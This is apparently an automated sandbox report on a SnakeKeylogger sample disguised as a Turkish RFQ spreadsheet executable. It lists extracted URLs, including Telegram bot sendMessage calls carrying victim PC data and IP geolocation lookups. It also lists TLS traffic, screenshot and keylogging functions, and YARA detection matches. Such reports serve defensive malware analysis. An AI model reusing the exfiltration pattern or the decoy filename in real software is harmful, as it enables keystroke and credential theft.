                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1222931721.0000000007872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: gNFUFfdz.exe, 0000000D.00000002.3659547274.0000000004174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org?q=
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000003080000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000003080000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000002F89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1211859451.00000000049EE000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 00000009.00000002.1255678048.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000003080000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3650503723.0000000000427000.00000040.00000400.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000002F89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.00000000033A2000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000003080000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000002F89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                Source: gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000003080000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000002F89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878164%0D%0ADate%20a
                Source: gNFUFfdz.exe, 0000000D.00000002.3659547274.0000000004174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3658775474.0000000004495000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3659547274.0000000004174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3658775474.0000000004495000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3659547274.0000000004174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: gNFUFfdz.exe, 0000000D.00000002.3654868131.000000000300E000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000002FAB000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.000000000303F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003328000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000003009000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                Source: gNFUFfdz.exe, 0000000D.00000002.3659547274.0000000004174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3658775474.0000000004495000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3659547274.0000000004174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: gNFUFfdz.exe, 0000000D.00000002.3659547274.0000000004174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: svchost.exe, 00000008.00000003.1206544234.000001A3A2742000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                Source: edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                Source: svchost.exe, 00000008.00000003.1206544234.000001A3A2742000.00000004.00000800.00020000.00000000.sdmp, edb.log.8.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
                Source: gNFUFfdz.exe, 0000000D.00000002.3659547274.0000000004174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: svchost.exe, 00000008.00000003.1206544234.000001A3A2742000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.8.dr, edb.log.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
                Source: edb.log.8.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003393000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003212000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003385000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003372000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000002EF2000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000002F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000000.00000002.1211859451.00000000049EE000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003212000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 00000009.00000002.1255678048.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000002EF2000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3650503723.0000000000427000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000003064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003393000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.000000000323B000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003385000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003280000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003372000.00000004.00000800.00020000.00000000.sdmp, 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.00000000032A6000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000003051000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000002F1C000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000002F89000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.0000000003064000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3658775474.0000000004495000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3659547274.0000000004174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3658775474.0000000004495000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3659547274.0000000004174000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: gNFUFfdz.exe, 0000000D.00000002.3654868131.000000000303F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe, 00000007.00000002.3653904508.0000000003359000.00000004.00000800.00020000.00000000.sdmp, gNFUFfdz.exe, 0000000D.00000002.3654868131.000000000303A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to capture screen (.Net source)
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 9.2.gNFUFfdz.exe.3d72c20.4.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 9.2.gNFUFfdz.exe.3d2fc00.3.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Contains functionality to log keystrokes (.Net Source)
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                Source: 9.2.gNFUFfdz.exe.3d72c20.4.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                Source: 9.2.gNFUFfdz.exe.3d2fc00.3.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 13.2.gNFUFfdz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 13.2.gNFUFfdz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 9.2.gNFUFfdz.exe.3d2fc00.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 9.2.gNFUFfdz.exe.3d2fc00.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 9.2.gNFUFfdz.exe.3d2fc00.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 9.2.gNFUFfdz.exe.3d72c20.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 9.2.gNFUFfdz.exe.3d72c20.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 9.2.gNFUFfdz.exe.3d72c20.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.4a318a0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 9.2.gNFUFfdz.exe.3d72c20.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 9.2.gNFUFfdz.exe.3d72c20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 9.2.gNFUFfdz.exe.3d72c20.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 9.2.gNFUFfdz.exe.3d2fc00.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 9.2.gNFUFfdz.exe.3d2fc00.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 9.2.gNFUFfdz.exe.3d2fc00.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe.49ee880.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0000000D.00000002.3650503723.0000000000427000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000009.00000002.1255678048.0000000003D2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1211859451.00000000049EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe PID: 7828, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: gNFUFfdz.exe PID: 7624, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: gNFUFfdz.exe PID: 2964, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: 2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exe
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_017D3E280_2_017D3E28
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_017DE1640_2_017DE164
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_017D6F920_2_017D6F92
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_06210BD40_2_06210BD4
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_062175380_2_06217538
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_062120F00_2_062120F0
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_062101200_2_06210120
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_062101300_2_06210130
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_062175280_2_06217528
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_062E76380_2_062E7638
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_062E76600_2_062E7660
                Source: C:\Users\user\Desktop\2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeCode function: 0_2_062E76700_2_062E7670
